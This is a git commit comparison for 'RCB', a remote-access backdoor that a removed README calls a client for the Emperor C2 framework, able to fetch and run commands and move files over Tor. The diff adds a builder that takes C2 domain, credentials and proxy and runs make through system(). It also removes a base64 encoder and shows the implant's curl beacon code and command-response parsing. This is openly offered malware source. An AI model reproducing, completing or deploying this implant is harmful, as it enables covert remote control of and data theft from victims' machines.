Compare commits
No commits in common. "66c0839d5462b1251dd82882bf714b844ac30ee0" and "8fce3c4f76a4ef0423658ad41edd5d5adad367c6" have entirely different histories.
66c0839d54
...
8fce3c4f76
|
@ -1 +0,0 @@
|
||||||
bin
|
|
|
@ -1,19 +0,0 @@
|
||||||
{
|
|
||||||
"configurations": {
|
|
||||||
"Debug RCB": {
|
|
||||||
"adapter": "vscode-cpptools",
|
|
||||||
"configuration": {
|
|
||||||
"type": "cppdbg",
|
|
||||||
"request": "launch",
|
|
||||||
"program": "${workspaceRoot}/RCB",
|
|
||||||
"args": [
|
|
||||||
],
|
|
||||||
"cwd": "${workspaceRoot}",
|
|
||||||
"environment": [
|
|
||||||
],
|
|
||||||
"MIMode": "gdb"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
#include <iostream>
|
||||||
|
#include <string>
|
||||||
|
|
||||||
|
int main()
|
||||||
|
{
|
||||||
|
std::string sUsername;
|
||||||
|
std::string sPassword;
|
||||||
|
std::string sC2Domain;
|
||||||
|
std::string sProxy;
|
||||||
|
|
||||||
|
std::cout << "Enter the username to be used by RCB: ";
|
||||||
|
std::cin >> sUsername;
|
||||||
|
|
||||||
|
std::cout << "Enter the password to be used by RCB: ";
|
||||||
|
std::cin >> sPassword;
|
||||||
|
|
||||||
|
std::cout << "Enter the C2 domain to be used by RCB: ";
|
||||||
|
std::cin >> sC2Domain;
|
||||||
|
|
||||||
|
std::cout << "Enter the socks5 proxy address to be used by RCB: ";
|
||||||
|
std::cin >> sProxy;
|
||||||
|
|
||||||
|
std::string sCommand = "sUsername=" + sUsername + " sPassword=" + sPassword + " sC2Domain=" + "http:/" + sC2Domain + " sProxy=" + "socks5h:/" + sProxy + " make"; // todo: figure out why this works and why // doesn't
|
||||||
|
const char *cCommand = sCommand.c_str(); // convert string to c string for running as command
|
||||||
|
|
||||||
|
system(cCommand); // run the make command with environment variables
|
||||||
|
}
|
54
RCB.cpp
54
RCB.cpp
|
@ -1,7 +1,6 @@
|
||||||
#include <curl/curl.h>
|
#include <curl/curl.h>
|
||||||
#include <unistd.h>
|
#include <unistd.h>
|
||||||
|
|
||||||
#include <array>
|
|
||||||
#include <fstream>
|
#include <fstream>
|
||||||
#include <iostream>
|
#include <iostream>
|
||||||
#include <regex>
|
#include <regex>
|
||||||
|
@ -25,61 +24,15 @@ size_t writeCallback(void *contents, size_t size, size_t nmemb, std::string *s)
|
||||||
return newLength;
|
return newLength;
|
||||||
}
|
}
|
||||||
|
|
||||||
std::string encodeTriplet(std::uint8_t iByte1, std::uint8_t iByte2, std::uint8_t iByte3)
|
|
||||||
{
|
|
||||||
std::array<char, 64> encodeTable{'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',
|
|
||||||
'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',
|
|
||||||
's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'};
|
|
||||||
std::string sEncodedTriplet = "";
|
|
||||||
std::uint32_t combinedTriplet = (iByte1 << 16) | (iByte2 << 8) | iByte3;
|
|
||||||
sEncodedTriplet += encodeTable[combinedTriplet >> 18];
|
|
||||||
sEncodedTriplet += encodeTable[combinedTriplet >> 12 & 0x3F];
|
|
||||||
sEncodedTriplet += encodeTable[combinedTriplet >> 6 & 0x3F];
|
|
||||||
sEncodedTriplet += encodeTable[combinedTriplet & 0x3F];
|
|
||||||
return sEncodedTriplet;
|
|
||||||
}
|
|
||||||
|
|
||||||
std::string b64Encode(std::string sWriteData)
|
|
||||||
{
|
|
||||||
std::string sEncodedData = "";
|
|
||||||
std::string sEncodedBuffer;
|
|
||||||
|
|
||||||
while (sWriteData.length() > 0)
|
|
||||||
{
|
|
||||||
if (sWriteData.length() >= 3)
|
|
||||||
{
|
|
||||||
sEncodedData += encodeTriplet(sWriteData[0], sWriteData[1], sWriteData[2]);
|
|
||||||
sWriteData.erase(0, 3);
|
|
||||||
}
|
|
||||||
else if (sWriteData.length() == 2)
|
|
||||||
{
|
|
||||||
sEncodedBuffer = encodeTriplet(sWriteData[0], sWriteData[1], '0');
|
|
||||||
sEncodedBuffer.replace(3, 1, "$");
|
|
||||||
sEncodedData += sEncodedBuffer;
|
|
||||||
sWriteData.erase();
|
|
||||||
}
|
|
||||||
else if (sWriteData.length() == 1)
|
|
||||||
{
|
|
||||||
sEncodedBuffer = encodeTriplet(sWriteData[0], '0', '0');
|
|
||||||
sEncodedBuffer.replace(2, 2, "$$");
|
|
||||||
sEncodedData += sEncodedBuffer;
|
|
||||||
sWriteData.erase();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return sEncodedData;
|
|
||||||
}
|
|
||||||
|
|
||||||
std::string sendData(std::string sParam1, std::string sValue1, std::string sParam2 = "", std::string sValue2 = "")
|
std::string sendData(std::string sParam1, std::string sValue1, std::string sParam2 = "", std::string sValue2 = "")
|
||||||
{
|
{
|
||||||
CURL *curl;
|
CURL *curl;
|
||||||
CURLcode res;
|
CURLcode res;
|
||||||
std::string sReadData;
|
std::string sReadData;
|
||||||
sValue1 = b64Encode(sValue1);
|
|
||||||
std::string sWriteData = sParam1 + "=" + sValue1;
|
std::string sWriteData = sParam1 + "=" + sValue1;
|
||||||
|
|
||||||
if (sParam2 != "")
|
if (sParam2 != "")
|
||||||
{
|
{
|
||||||
sValue2 = b64Encode(sValue2);
|
|
||||||
sWriteData = sWriteData + "&" + sParam2 + "=" + sValue2;
|
sWriteData = sWriteData + "&" + sParam2 + "=" + sValue2;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -184,6 +137,13 @@ int main()
|
||||||
std::string sSplit;
|
std::string sSplit;
|
||||||
for (int i = 0; i < sResponse.length(); i++)
|
for (int i = 0; i < sResponse.length(); i++)
|
||||||
{
|
{
|
||||||
|
/*if (sResponse[i] == '\n' && bFilename == true)
|
||||||
|
{
|
||||||
|
sData.push_back(sSplit); // add the sSplit string to the vector of strings sCommands
|
||||||
|
sSplit = ""; // set sSplit to empty
|
||||||
|
bFilename = false;
|
||||||
|
}*/
|
||||||
|
|
||||||
if (sResponse[i] == '=' || sResponse[i] == '&') // if we have reached the end of the parameter
|
if (sResponse[i] == '=' || sResponse[i] == '&') // if we have reached the end of the parameter
|
||||||
{
|
{
|
||||||
sData.push_back(sSplit); // add the sSplit string to the vector of strings sCommands
|
sData.push_back(sSplit); // add the sSplit string to the vector of strings sCommands
|
||||||
|
|
|
@ -1,9 +0,0 @@
|
||||||
# Remote Control Beacon
|
|
||||||
A client side Emperor C2 framework backdoor.
|
|
||||||
|
|
||||||
This backdoor can communicate with Emperor itself, and can perform the following functions:
|
|
||||||
* Connect to the server (via TOR through a configured FOB)
|
|
||||||
* Request and execute commands
|
|
||||||
* Upload and download files to and from the server
|
|
||||||
|
|
||||||
Most of the communications between the client and server are base64 encoded, but not encrypted. This means that the traffic, before reaching the FOB, is unencrypted. I was considering maybe adding RC4 encryption in the future :)
|
|
Loading…
Reference in New Issue